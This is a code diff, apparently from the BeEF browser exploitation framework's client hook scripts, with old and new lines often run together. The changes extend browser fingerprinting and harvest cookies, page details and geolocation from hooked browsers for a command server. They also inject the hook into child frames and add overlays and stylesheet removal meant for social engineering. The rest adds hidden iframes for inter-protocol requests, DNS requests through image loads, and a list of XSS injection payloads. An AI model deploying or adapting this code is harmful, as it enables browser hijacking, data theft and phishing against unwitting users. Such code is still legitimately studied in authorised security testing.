return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
*/
isC26:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome for iOS 26.
* @example: beef.browser.isC26iOS()
*/
isC26iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome 27.
* @example: beef.browser.isC27()
*/
isC27:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome for iOS 27.
* @example: beef.browser.isC27iOS()
*/
isC27iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome 28.
* @example: beef.browser.isC28()
*/
isC28:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome for iOS 28.
* @example: beef.browser.isC28iOS()
*/
isC28iOS:function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/** /**
* Returns true if Chrome. * Returns true if Chrome.
* @example: beef.browser.isC() * @example: beef.browser.isC()
*/ */
isC:function () { isC:function () {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25(); return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
}, },
/** /**
@@ -524,12 +652,25 @@ beef.browser = {
C17:this.isC17(), // Chrome 17 C17:this.isC17(), // Chrome 17
C18:this.isC18(), // Chrome 18 C18:this.isC18(), // Chrome 18
C19:this.isC19(), // Chrome 19 C19:this.isC19(), // Chrome 19
C19iOS:this.isC19iOS(), // Chrome 19 on iOS
C20:this.isC20(), // Chrome 20 C20:this.isC20(), // Chrome 20
C20iOS:this.isC20iOS(), // Chrome 20 on iOS
C21:this.isC21(), // Chrome 21 C21:this.isC21(), // Chrome 21
C21iOS:this.isC21iOS(), // Chrome 21 on iOS
C22:this.isC22(), // Chrome 22 C22:this.isC22(), // Chrome 22
C22iOS:this.isC22iOS(), // Chrome 22 on iOS
C23:this.isC23(), // Chrome 23 C23:this.isC23(), // Chrome 23
C23iOS:this.isC23iOS(), // Chrome 23 on iOS
C24:this.isC24(), // Chrome 24 C24:this.isC24(), // Chrome 24
C24iOS:this.isC24iOS(), // Chrome 24 on iOS
C25:this.isC25(), // Chrome 25 C25:this.isC25(), // Chrome 25
C25iOS:this.isC25iOS(), // Chrome 25 on iOS
C26:this.isC26(), // Chrome 26
C26iOS:this.isC26iOS(), // Chrome 26 on iOS
C27:this.isC27(), // Chrome 27
C27iOS:this.isC27iOS(), // Chrome 27 on iOS
C28:this.isC28(), // Chrome 28
C28iOS:this.isC28iOS(), // Chrome 28 on iOS
C:this.isC(), // Chrome any version C:this.isC(), // Chrome any version
FF2:this.isFF2(), // Firefox 2 FF2:this.isFF2(), // Firefox 2
@@ -552,7 +693,8 @@ beef.browser = {
FF17:this.isFF17(), // Firefox 17 FF17:this.isFF17(), // Firefox 17
FF18:this.isFF18(), // Firefox 18 FF18:this.isFF18(), // Firefox 18
FF19:this.isFF19(), // Firefox 19 FF19:this.isFF19(), // Firefox 19
FF20:this.isFF20(), // Firefox 20 FF20:this.isFF20(), // Firefox 20
FF21:this.isFF21(), // Firefox 21
FF:this.isFF(), // Firefox any version FF:this.isFF(), // Firefox any version
IE6:this.isIE6(), // Internet Explorer 6 IE6:this.isIE6(), // Internet Explorer 6
@@ -644,30 +786,82 @@ beef.browser = {
return '19' return '19'
} }
; // Chrome 19 ; // Chrome 19
if (this.isC19iOS()) {
return '19'
}
; // Chrome 19 for iOS
if (this.isC20()) { if (this.isC20()) {
return '20' return '20'
} }
; // Chrome 20 ; // Chrome 20
if (this.isC20iOS()) {
return '20'
}
; // Chrome 20 for iOS
if (this.isC21()) { if (this.isC21()) {
return '21' return '21'
} }
; // Chrome 21 ; // Chrome 21
if (this.isC21iOS()) {
return '21'
}
; // Chrome 21 for iOS
if (this.isC22()) { if (this.isC22()) {
return '22' return '22'
} }
; // Chrome 22 ; // Chrome 22
if (this.isC22iOS()) {
return '22'
}
; // Chrome 22 for iOS
if (this.isC23()) { if (this.isC23()) {
return '23' return '23'
} }
; // Chrome 23 ; // Chrome 23
if (this.isC23iOS()) {
return '23'
}
; // Chrome 23 for iOS
if (this.isC24()) { if (this.isC24()) {
return '24' return '24'
} }
; // Chrome 24 ; // Chrome 24
if (this.isC24iOS()) {
return '24'
}
; // Chrome 24 for iOS
if (this.isC25()) { if (this.isC25()) {
return '25' return '25'
} }
; ; // Chrome 25
if (this.isC25iOS()) {
return '25'
}
; // Chrome 25 for iOS
if (this.isC26()) {
return '26'
}
; // Chrome 26
if (this.isC26iOS()) {
return '26'
}
; // Chrome 26 for iOS
if (this.isC27()) {
return '27'
}
; // Chrome 27
if (this.isC27iOS()) {
return '27'
}
; // Chrome 27 for iOS
if (this.isC28()) {
return '28'
}
; // Chrome 28
if (this.isC28iOS()) {
return '28'
}
; // Chrome 28 for iOS
if (this.isFF2()) { if (this.isFF2()) {
return '2' return '2'
} }
@@ -748,10 +942,14 @@ beef.browser = {
return '19' return '19'
} }
; // Firefox 19 ; // Firefox 19
if (this.isFF20()) { if (this.isFF20()) {
return '20' return '20'
} }
; // Firefox 20 ; // Firefox 20
if (this.isFF21()) {
return '21'
}
; // Firefox 21
if (this.isIE6()) { if (this.isIE6()) {
return '6' return '6'
@@ -858,10 +1056,10 @@ beef.browser = {
try { try {
// append hook script // append hook script
self.frames[i].document.body.appendChild(script); self.frames[i].document.body.appendChild(script);
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) { } catch (e) {
// warn on cross-domain // warn on cross-domain
//console.log("Hooking frame failed"); beef.debug("Hooking frame failed");
} }
} }
}, },
@@ -1069,8 +1267,9 @@ beef.browser = {
*/ */
hasPhonegap:function () { hasPhonegap:function () {
var result = false; var result = false;
try { try {
if (!!device.phonegap) result = true; else result = false; if (!!device.phonegap || !!device.cordova) result = true; else result = false;
} }
catch (e) { catch (e) {
result = false; result = false;
@@ -1436,63 +1635,64 @@ beef.browser = {
getDetails:function () { getDetails:function () {
var details = new Array(); var details = new Array();
var browser_name = beef.browser.getBrowserName(); var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion(); var browser_version = beef.browser.getBrowserVersion();
var browser_reported_name = beef.browser.getBrowserReportedName(); var browser_reported_name = beef.browser.getBrowserReportedName();
var page_title = (document.title) ? document.title : "Unknown"; var page_title = (document.title) ? document.title : "Unknown";
var page_uri = document.location.href; var page_uri = (document.location.href) ? document.location.href : "Unknown";
var page_referrer = (document.referrer) ? document.referrer : "Unknown"; var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var hostname = document.location.hostname; var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
var hostport = (document.location.port) ? document.location.port : "80"; var hostport = (document.location.port) ? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins(); var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString(); var date_stamp = new Date().toString();
var os_name = beef.os.getName(); var os_name = beef.os.getName();
var hw_name = beef.hardware.getName(); var hw_name = beef.hardware.getName();
var cpu_type = beef.hardware.cpuType(); var cpu_type = beef.hardware.cpuType();
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No"; var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) { var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
if (value == true) return value; else if (typeof value == 'object') return value; else return; if (value == true) return value; else if (typeof value == 'object') return value; else return;
}); });
var screen_size = beef.browser.getScreenSize(); var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize(); var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No"; var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No"; var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No"; var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No"; var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No"; var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No"; var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No"; var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No"; var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No"; var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No"; var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No"; var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No"; var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
try{ try{
var cookies = document.cookie; var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No"; var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No"; var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
if (cookies) details["Cookies"] = cookies; if (cookies) details['Cookies'] = cookies;
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies; if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies; if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
}catch(e){ }catch(e){
// the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way, // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
// and there is no reason to read cookies at this point // and there is no reason to read cookies at this point
details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly."; details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
details["hasSessionCookies"] = "No"; details['hasSessionCookies'] = "No";
details["hasPersistentCookies"] = "No"; details['hasPersistentCookies'] = "No";
} }
if (browser_name) details["BrowserName"] = browser_name; if (browser_name) details['BrowserName'] = browser_name;
if (browser_version) details["BrowserVersion"] = browser_version; if (browser_version) details['BrowserVersion'] = browser_version;
if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name; if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
if (page_title) details["PageTitle"] = page_title; if (page_title) details['PageTitle'] = page_title;
if (page_uri) details["PageURI"] = page_uri; if (page_uri) details['PageURI'] = page_uri;
if (page_referrer) details["PageReferrer"] = page_referrer; if (page_referrer) details['PageReferrer'] = page_referrer;
if (hostname) details["HostName"] = hostname; if (hostname) details['HostName'] = hostname;
if (hostport) details["HostPort"] = hostport; if (hostport) details['HostPort'] = hostport;
if (browser_plugins) details["BrowserPlugins"] = browser_plugins; if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
if (os_name) details['OsName'] = os_name; if (os_name) details['OsName'] = os_name;
if (hw_name) details['Hardware'] = hw_name; if (hw_name) details['Hardware'] = hw_name;
if (cpu_type) details['CPU'] = cpu_type; if (cpu_type) details['CPU'] = cpu_type;
@@ -1503,11 +1703,12 @@ beef.browser = {
if (screen_size) details['ScreenSize'] = screen_size; if (screen_size) details['ScreenSize'] = screen_size;
if (window_size) details['WindowSize'] = window_size; if (window_size) details['WindowSize'] = window_size;
if (java_enabled) details['JavaEnabled'] = java_enabled; if (java_enabled) details['JavaEnabled'] = java_enabled;
if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
if (has_flash) details['HasFlash'] = has_flash if (has_flash) details['HasFlash'] = has_flash;
if (has_phonegap) details['HasPhonegap'] = has_phonegap if (has_phonegap) details['HasPhonegap'] = has_phonegap;
if (has_web_socket) details['HasWebSocket'] = has_web_socket if (has_web_socket) details['HasWebSocket'] = has_web_socket;
if (has_googlegears) details['HasGoogleGears'] = has_googlegears if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
if (has_webrtc) details['HasWebRTC'] = has_webrtc;
if (has_activex) details['HasActiveX'] = has_activex; if (has_activex) details['HasActiveX'] = has_activex;
if (has_silverlight) details['HasSilverlight'] = has_silverlight; if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime; if (has_quicktime) details['HasQuickTime'] = has_quicktime;
@@ -1526,6 +1727,13 @@ beef.browser = {
return !!window.ActiveXObject; return !!window.ActiveXObject;
}, },
/**
* Returns boolean value depending on whether the browser supports WebRTC
*/
hasWebRTC:function () {
return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
},
/** /**
* Returns boolean value depending on whether the browser supports Silverlight * Returns boolean value depending on whether the browser supports Silverlight
*/ */

147
core/main/client/dom.js
View File

@@ -76,6 +76,30 @@ beef.dom = {
return iframe; return iframe;
}, },
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/** /**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted. * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
var form_action = params['src']; var form_action = params['src'];
params['src'] = ''; params['src'] = '';
} }
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); } if (type == 'hidden') {
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); } css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body'); var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action) if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
} }
}); });
}, },
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/** /**
* Create a form element with the specified parameters, appending it to the DOM if append == true * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -292,7 +392,7 @@ beef.dom = {
} }
content += "</object>"; content += "</object>";
} }
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) { if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) { if (codebase != null) {
content = "" + content = "" +
@@ -311,24 +411,25 @@ beef.dom = {
} }
content += "</applet>"; content += "</applet>";
} }
if (beef.browser.isFF()) { // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
if (codebase != null) { // if (beef.browser.isFF()) {
content = "" + // if (codebase != null) {
"<embed id='" + id + "' code='" + code + "' " + // content = "" +
"type='application/x-java-applet' codebase='" + codebase + "' " + // "<embed id='" + id + "' code='" + code + "' " +
"height='0' width='0' name='" + name + "'>"; // "type='application/x-java-applet' codebase='" + codebase + "' " +
} else { // "height='0' width='0' name='" + name + "'>";
content = "" + // } else {
"<embed id='" + id + "' code='" + code + "' " + // content = "" +
"type='application/x-java-applet' archive='" + archive + "' " + // "<embed id='" + id + "' code='" + code + "' " +
"height='0' width='0' name='" + name + "'>"; // "type='application/x-java-applet' archive='" + archive + "' " +
} // "height='0' width='0' name='" + name + "'>";
// }
if (params != null) { //
content += beef.dom.parseAppletParams(params); // if (params != null) {
} // content += beef.dom.parseAppletParams(params);
content += "</embed>"; // }
} // content += "</embed>";
// }
$j('body').append(content); $j('body').append(content);
}, },
@@ -375,11 +476,11 @@ beef.dom = {
* @params: {String} rport: remote port * @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service * @params: {String} commands: protocol commands to be executed by the remote host:port service
*/ */
createIframeIpecForm: function(rhost, rport, commands){ createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe(); var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form'); var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html'); formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST'); formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data'); formIpec.setAttribute('enctype', 'multipart/form-data');

10
core/main/client/geolocation.js
View File

@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({ $j.ajax({
error: function(xhr, status, error){ error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error"); beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude + "&longitude=" + longitude
+ "&osm=UNAVAILABLE" + "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True"); + "&geoLocEnabled=True");
}, },
success: function(data, status, xhr){ success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success"); beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data); var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return; return;
} }
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition"); beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success function(position){ // success
var latitude = position.coords.latitude; var latitude = position.coords.latitude;
var longitude = position.coords.longitude; var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude); beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure }, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code); beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3 switch(error.code) // Returns 0-3
{ {
case 0: case 0:

2
core/main/client/hardware.js
View File

@@ -126,4 +126,4 @@ beef.hardware = {
} }
}; };
beef.regCmp('beef.net.hardware'); beef.regCmp('beef.hardware');

7
core/main/client/init.js
View File

@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know * and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again. * the brwoser details. So sendback the browser details again.
*/ */
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) { if (beef.pageIsLoaded) {
beef.net.browser_details(); beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try { try {
callback(event); callback(event);
} catch (e) { } catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message); beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
} }
return false; return false;
} }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
try { try {
callback(event); callback(event);
} catch (e) { } catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message); beef.debug("window.onclose - couldn't execute callback: " + e.message);
} }
return false; return false;
} }

2
core/main/client/net/dns.js
View File

@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request // sends a DNS request
sendQuery = function(query) { sendQuery = function(query) {
//console.log("Requesting: "+query); beef.debug("Requesting: "+query);
var img = new Image; var img = new Image;
img.src = "http://"+query; img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); } img.onload = function() { dom.removeChild(this); }

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [ vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true}, {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //, {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true}, {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
